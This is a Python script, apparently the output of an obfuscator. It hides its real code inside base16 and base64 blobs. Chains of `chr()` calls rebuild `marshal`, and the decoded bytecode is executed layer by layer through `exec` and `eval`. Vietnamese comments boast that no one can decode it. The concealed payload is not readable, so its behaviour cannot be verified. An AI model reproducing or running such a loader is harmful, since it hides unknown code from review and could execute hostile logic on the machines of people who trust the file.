__Tác_Giả__ = 'LeQuangDung'
__Được_Làm_Bởi__ = 'LeQuangDungTop1'
__Đôi_Lời_Muốn_Gửi_Đến_Những_Thằng_Decode__ = 'Trùm Lê Quang Dũng Thách Thằng Mõm Nào Dec'

# En Thì Dễ Chỉ Là Không Thể Giải Mã Dược!
class LeQuangDung():
    def __init__(self, way: bytes, key: int, **ext) -> None: self.way = way;self.key = key; self.module__ = ext.get('__module', None);self.__globals = ext.get('__globals', None);self.__module = ext.get('__module', None); self.__LovePython = ext.get('LovePython', None)
    def Pass(self): exec(eval(eval('chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(109)+chr(97)+chr(114)+chr(115)+chr(104)+chr(97)+chr(108)+chr(34)+chr(41)')).loads(self.module__.b16decode(self.way)), {'__selfObject__': self, '__key__': self.key, '__module': self.module__, '__globals': self.__globals, '__LovePythonObject__': self.__LovePython}); return self
class LovePython():
    def __init__(self, code: str, layersFunction: bytes, module, globals_, backend: bytes = b'') -> None: self.__module = module;self.layersFunction = layersFunction;self.__globals = globals_;self.code = {'bytes': code, 'str': str(code)}; self.__backend = backend
    def __tunnel(self) -> LeQuangDung: return LeQuangDung(self.__backend, 2843, __module = self.__module, __globals = self.__globals, LovePython = self)
    def Run(self) -> None: decoder = self.__getobject__(); gate = self.__tunnel().Pass();exec(eval(eval(eval('chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(109)+chr(97)+chr(114)+chr(115)+chr(104)+chr(97)+chr(108)+chr(34)+chr(41)')).loads(decoder), {'__selfObject__': self, '__module': self.__module, '__sr_m': eval(eval('chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(109)+chr(97)+chr(114)+chr(115)+chr(104)+chr(97)+chr(108)+chr(34)+chr(41)')), '__globals': self.__globals, 'gate': gate}), self.__globals)
    def __getobject__(self) -> object: func = self.layersFunction; return self.__module.b64decode(func)

LovePython(b'QZZ~{Rz*fmQEWy?QC4h4QB^TRRaIm{S5;C%R8>k+QZPnZQbk5iQEWy?QC4h4QB^TRRaIm{S5;C%R8>k+QZPnZQbk5iQEWy?S5|CAQB^TRRaIm{S5;C<R8>k+QZPnZQbk5iQEWy?PDXH6QZO+?RaIn0S5;C%R8>k+QZZ|JRz*fmQEY5TR90+7QC3DvRaIm{S5{I^RBK97QZPzFRz*%uQEW;`S5!(xQB^TZRxoTzS5;C*RBUimQ&li}Rz)#SQ*1^^QB+bzQZO+?RaI<8S5;C%R8??TQZYtaQbkr$Q*25|QC4hKR8=)YRaIn8O)yqQR8>k;QhHKhQdMM6S8QZRR#t39QB^rZRz+k&S5;O-R8>k+QZQ9|QblY|QEXO9QdVqLQB^TZRxo5zS5;C>RBTQ}QZPngQbjpVRWMRWPDD;cQ!p_@RWM{)O>0s@RBUisQZO-EQbkTrRcu;FQC4t8R8=)YRaIz0PDN5kR8>k-QZQ9|Rz*fmQEX&LR#t39QdKomR#jv|PDWBvR90|OQZQCpRz*2ZQEWy?S5!(>QB^ThRxo5zS5;O-R4__aQZPnZRz*%vS8PT|QB+PvQ!p_@RWM{)O>0s@RaQz`QZO-EQbkTqQ*3BRQC4h4R8=)gRaIn4O)yeQR8>wzQ$<E$Rz*fmQ*25|PDX4+QB^flR%>KJS8GyERBK97Q$<xUQblA=QEW;`QdCY=QB^TRRxo5%S5;C*RBTFCQZPzHQbtBjS8PT|QdVqLR4_3^RaInKO>9y^R8~q@QZYtaQdM+NQEXC3QC4hKQ7|=ORaIm{O)yeSR8>k;QZZ|JQbk5kQ*3NVR90+7Q7|z}S4Ct(S5;C@RBLcjQZQ?JQblY|Q7~jlQC4tOQB^TZRcm7~S5;C%RBTFDQZPngQbjROQEWy^Q&dt#QZO+?RcmBMO)*kJR8>k?QZZIqQbkrzRcuyBQdVq5RaG%zRaIn0S5{I`R8>k+QZZ|JRz*fmRcvHPRaR_8RWLb2Rz+k&S5{I)RBUikQZPk&Qblx5QEW~~S5!(xQ7|z}S5;(AS5;C(R8??UQZPnZQbjROQ*1^^Q&dhxQ&llbRWN8mS8P&3R8??OQhHKaQbk5jRcu;FQC4t8R8=)YRaIz4PDN5kR8>k-QZQ9|Rz*fmQEX&LR#t39QdKomR#jw1S8P&JR90|OQZQCpRz*2ZQEWy?S5!(>QB^ThRxo5zS5;O<R4__aQZPnZRz*%vS8PT|QB+PvQ!p_@RWM{)O>0s_RBK9FQZO-EQbkTqQ*3BRQC4h4R8=)gRaIn4O)yeQR8>k^Q$<E$Rz*fmQ*25|PDX4+QB^flR%>KJS8GyERBK98QZZF9QblA=QEW;`QdCY=QB^TRRxo5%S5;C*RBTFCQZPj@Rz^lnS8PT|QdVqLR4_3^RaInKO>9y^R8~q@QZYtaQdLe+QEXC3QC4hKQ7|=ORaIm{O)yeSR8>k;QZZ|JQbk5mRcvfXR90+7Q7|z}S4Ct(S5;C@RBLcjQZQ?JQblY|Q*2~OQC4tOQB^TZRcm7~S5;C%RBTFDQZPngQbjROQEWy@QdCk!QZO+?RcmBMO)*kJR8>k?QZZIqQbkrzRcuyBQdCY=RaG%zRaIn0S5{I`R8>k+QZZ|JRz*fmRcvHPRaR_ORaH4dRz+k&S5{I)RBUikQZPk&Qblx5QEW~~S5!(xQ7}16S5;(AS5;C(R8??UQZPnZQbjROQ*1^^Q&dhxQ&llbS5;_2S8P&3R8??OQhHKaQbk5jRcu;FQC4t8R8=)YRaIz4PDN5kR8>k-QZQ9|Rz*fmQEX&LR#t39QdKomR#jw2QC3n?R90|OQZQCpRz*2ZQEWy?S5!(>QB^ThRxo5zS5{U=R4__aQZPnZRz*%vS8PT|QB+PvQ!p_@RWM{)O>0s@R4{N_QZO-EQbkTqQ*3BRQC4h4R8=)gRaIn4O)yeQR8>w!Q$<E$Rz*fmQ*25|PDX4+QB^flR%>KJS8GyERBK98Q&li9QblA=QEW;`QdCY=QB^TRRxo5%S5;C*RBTFCQZQOXQbtBjS8PT|QdVqLR4_3^RaInKO>9y^R8~q@QZYtaR#kLRQEXC3QC4hKQ7|=ORaIm{O)yeSR8>k;QZZ|JQbkTvRcvfXR90+7Q7|z}S4Ct(S5;C@RBLcjQZO)jQblx5QEXO7S5!(xQdKcSS5;(AS5;C(RBTQ|QZPk%R#i?;QEWy?S5!_#Q!p_@S4C__S5{I&R8??TQZYthQbkTrRcuyBQ&w<AR8=)YRWM{uPDNHqR8>k<Q&m=4Qbk5kQ7}qKQdVq5QB^fzRxo5jS5;C_R8&euQ&wwwQblx5QEYHXS5!(xQdKoWS5;(AS5;C(R8>k-QZPnZQbjROQ*1^`QdCYwQ&lljR%>WNS8P&3R8??NQZQCpQbk5jRcu;FQEN&?R8=)gRaIm{PDN5kR8>k+Q&m=4Qbk5iQ*2~NRaS6CR8~eyRcmBIS5{I|R90|OQZQCpQbkTqQEWy?S5!(>QC3D_Rxo5zS8GyGRBTFCQZQ>UQbjROQEX00QdCYwRWLC_RcmNMS8P&3R8~q-QZQCpQbk5jRcuyBQ)@<5Q!p`MRaIm{S8GyKR8~$zQhHH&Rz*frQ*1^^QC4h4QB^TRRaInHQbkfsRcuOEQZY(HRz+k|Q*25|S5|OUQ!z?YR#js#O)yeaRcmllQ&n(6R#i?;S8Q5JS5!(?R8~qvQEOyFQEO64RaS6VQZZF|Rz*%vS8Q5HS5|CQR8~q$Rxo2QO>0t0RBUipQZaBuRz)#SS8QlVR#t3PR4_3^RaIm{S5;C%R8>k>Q&wwvR#h=lS8P^EQdVq6QZO}CQ7~jfQ87|PRaQ<!Q&m=BRz)#RS8Q5JS5!(yQZYthRz++^S5;C@RclIDQ&wwvQbkr%Q*25~Q)@~^RWV9aRxoHrO>9<9RBLodQ&vhsRz*frRcuyDR8&qyQ!q74Rcm7~O>9z5R8??TQ&v@aQbjpWQEXO7PDDyoR8~q$Rxo2QO>9z1RBTR2QhHKaQblA=Q*3BRR#tFUQ7|z>RaIm{S5;C%R8>k>Q&wwvR#h=lS8P^EQdVq6QZO)iQ7~juO)yeaRBLodQZY(HR#kLPQ!q|SQ&dt`Q&lxnS8HTfQbkfqRclIFQZZUYRz*%yRWMFTQdVqLR8~q$R%>ipO>0t6RcmllQ&n(7QdLe<QEX&MQdCM-R8~e|R#j+5S5;O_R8@3DQ&n0+QdKceRWMpeR%=p4Q&vh#RxoHoQ87|PRaQ<!Q&n0;QbjRSQ*2~NPDDypR8=)gR#jwLPDNHsR8@3DQ&n0+QbkTrRWMpeS5!__Q!z?YR#jwDO)yeSRBTFBQZaBvQbjROQEX&LR#Zw>R8=)hQZQpMO>9y~R8~q-QZPnZQbk5iQEWy?R#ZwwR4_4AQblA>QEO6ERBTR0QZQ^<QblZ1O>0s}RBJ|7Q7|!6RaInGS5{I`RBLcpQZQ9|QdM+MRcvTTQ&wz6Q&lxYQblA}QC3n^RBTR1QZZ|KRz+4$QEXaBRa8zzRaQn}Rz++^S5{I^R90|UQ$<E$Qbk5jQ*2g9S5#6)Q!p`1Q7~*rQEO5}RBTR1QZZ|KRz+4$QEXO9RclIBQZYtTR%>KoQ7}?QR8>k=Q&w6-Rz+k|Q*1^^S8Gy5QdKcSR#jwDO)yeSRBTFBQhHWGRz*fmRcua3R90|BQC3PzS8HTaO>9y^R8>k+QZPnZQbk5nQ*3ZZS8GmHQB^TRRaIm{S5;C%RcmlzQZQ^<Qbk5iQEWy?QC4h4QC3PzS8HTeO>0s@R8>k+QZPnZQbk5nQ*3ZZS5#6(QB^TRRaIm{S5;C%RcmlzQ&w6-Rz*fmQEWy?QC4h4QC3PzS8HTaO>0s@R8>k+QZPnZQbk5jRcvrdR8&e;Q87wORaIm{S5;C%RcmlzQZYthRz*fmQEWy?QC4h4QB^flS8HrePDWBhRcmlkQZPnZQbk5nQ*3ZZRclIBQB^TRRaIm{S5;C%RcmlzQ&v`5Qbk5iQEWy?QC4h4QC3PzS8HTbQEO5{R8>k+QZPnZQbk5nQ*3ZbS5!(xQB^TRRaIm{S5;C%RcmlzQZZ|KRz*fmQEWy?QC4h4QB^flS8HreS8P&5RcmlkQZPnZQbk5nQ*3ZZRa8z@QB^TRRaIm{S5;C%RcmlzQZZ{VRz*fmQEWy?QC4h4QB^flS8HrWS8P&5RcmlkQZPnZQbk5nQ*3ZZRclT~QB^TRRaIm{S5;C%RcmlzQ&v`CRz*fmQEWy?QC4h4QB^flS8HraS5;C%R8??NQZPnZQbk5jRcvrdR#tFTQ87wORaIm{S5;C%RcmlzQZZ~{Rz*fmQEWy?QC4h4QC3PzS8HTSS5{I&R8>k+QZPnZQbk5nQ7}qKQC4t8R8~q;S4Ct`Q7~3SR8>k-QhHKhQbjpZQ*1^^R#Z+^Q!q7QR#jwLO)yeMRclIBQ$<E$QbtZrQEW;|Rcl67QB^rZRxo5%O)yqWRBTFBQZaBvQbjROQEX&MQdCYxQ!q7CS4CqmO>9y~R8??NQZPnZQbk5iQEWy^R8&euRWLC`Qfp*KQEOI4RaJCEQZaBuRz)#SS8Ps5QB+PvQZY(PRcmZZQEO6ER8??PQZPk&Qbkr%Q*25~Q)@~^RaQz<RWM{iO)*kLRBUipQZZ~=Rz+4$QEX^PRBKLEQ87kTQ7~*uS5{I+R8>k@Q$<QcRz+k|Q*25|S8Gy5QdKcSS4Ct}O)*kNRcmllQ&n(7QbtZtQ*2~PR#tFDQB^flRz+-9S5{U=RaQ<zQhHH(QbkTqRcuB`PDDyYR8=ucRxoT@S8Gy4RcmlzQZPnZQbk5iQEWy?QC4h4QB^feQEOyES8P&HRBK9DQZYq(Rz+k_O>0U>QdV$PQC3DvS4Ct(O)*kNRBTFNQZaBuRz*2aQEX00QC4t8R4_GDS5;(MPDWBjRBUimQ$<!<QdLe)RcuB`Q&wz6QdKcSRWM{iS5;O-R8>wxQ&vhsRz*foQEXaDS5!(?R8=)pQfp*dS5{I^RclIEQZZF|R#h=iQ!r#oRcl67QB^rZR%>ipO>9<9RBTR0QZZ~=Rz)#TQ*2~PR#Zw>R8=)hQZQswQ87|RR4{N-Q&vhuQdLe)QEX^PS5!__R8~e|RxoT@O)yeMRBTF9QZaBtRz*2ZO>0(4QdVq5QZO}BS4Cu6O>9z7RBKK~Q&m=4QblA>Rcum7S5#6(R4_4AQdMk5S5;C<RBTR2QhHKaQbjROQ*2~PR%=d1Q7|z?QEOyZQbkfsRcuOFQ$<yJQdMkES8PT|S8Gy5R4_49S4Ct}O>9<9RBLodQ&vhsRz*fnQEX^PQB+PvQ7|=OR#jwLPDNHqRaJ0OQhHH(QbkTrRcua3PDXH5R4_3^Rxo5nO)*kRRBTFGQ&vhsRz*foQEXaDS5!(?R8=)oRxo5*PDWBrRaS6VQZZF|R#h=iQ!r#oRcl67QB^fVS4Ct>O)yeSRBTF9QZZ|JQdMkHQ*1^^R#Z+!RWLPFQfp%{S5;C_RBLcqQZY(IQdLe)QEXO7S5!(>R4_S1RxoHrO)*kRRclT|QZPk%Rz*2ZQEX^PQ&dhxRWLPFQfp%{O>0(4RaJ0OQZYq(Qblx6S8QxZS5!(>R8=r}QEO;MS5;C%RBUimQZQ>UQbk5iQEWy?QC4h4QB^fzRWM{qPDN5eR8>k+QZPnZQbk5nQ7}qKQB+bzQ&l-jRxoT*O)*kJRBTR2QhHKhRz*2aQEX&NS5!__QdUYtQEOyEPDN5kRaS6VQ&vTKQdKceRcuyBPDDyoR8~e|Rxo5%S8P^HR8>k-QZPnZQbk5iQEWy?QB+P<QZO+?S5;&}S5;C%R8>k+QZPzIQdM+LQEWy^QdVq5QB^TRRcmBIS5;C(R8??PQZPnZRa7uJP*gBI',
    b'4wAAAAAAAAAAAAAAAAQAAAADAAAAQwAAAHN0AAAAdACDAGQBGQB9AHQAgwCgAWQCoQFzDWQAUwB0AIMAZAMZAH0BdACDAGQEGQB9AnwBagJkBRkAfQN8AqADfAOhAX0DfAKgBHwDoQF9A3wCoAV8A6EBfQN8AqAGfAOhAX0DdACDAGQGGQCgB3wDoQF9A3wDUwApB07aCV9fZ2xvYmFsc9oEZ2F0ZdoOX19zZWxmT2JqZWN0X1/aCF9fbW9kdWxl2gVieXRlc9oGX19zcl9tKQjaB2dsb2JhbHPaA2dldNoEY29kZdoJYjg1ZGVjb2Rl2gliNjRkZWNvZGXaCWIzMmRlY29kZdoJYjE2ZGVjb2Rl2gVsb2FkcykE2ghfZ2xvYmFsc9oDb2Jq2gZtb2R1bGVyCQAAAKkAchIAAAD6MWM6XFVzZXJzXGR1bmdnXE9uZURyaXZlXERvY3VtZW50c1xlbmNvZGVcdHVsYW0ucHnaDFJlbW92ZUxheWVyczwAAABzFgAAAAoBEAEKAQoBCgEKAQoBCgEKARABBAE=',
    eval(eval('chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(98)+chr(97)+chr(115)+chr(101)+chr(54)+chr(52)+chr(34)+chr(41)')), globals(),
    b'E3000000000000000000000000040000000200000043000000733E00000074008300640119007D0074008300640219007D0174008300640319007D027C016A01640419007D0364057C005F027C026406140064071B007C036602530029084EDA0E5F5F73656C664F626A6563745F5FDA145F5F4C6F7665507974686F6E4F626A6563745F5FDA075F5F6B65795F5FDA05627974657354E908000000E7000000000000F83F2903DA07676C6F62616C73DA04636F6465DA0865786563757465642904DA036F626ADA0D4C6F7665507974686F6E4F626ADA036B65797208000000A900720D000000FA31633A5C55736572735C64756E67675C4F6E6544726976655C446F63756D656E74735C656E636F64655C74756C616D2E7079DA0B4C655175616E6744756E671E000000730C0000000A010A010A010A0106011001'
).Run()
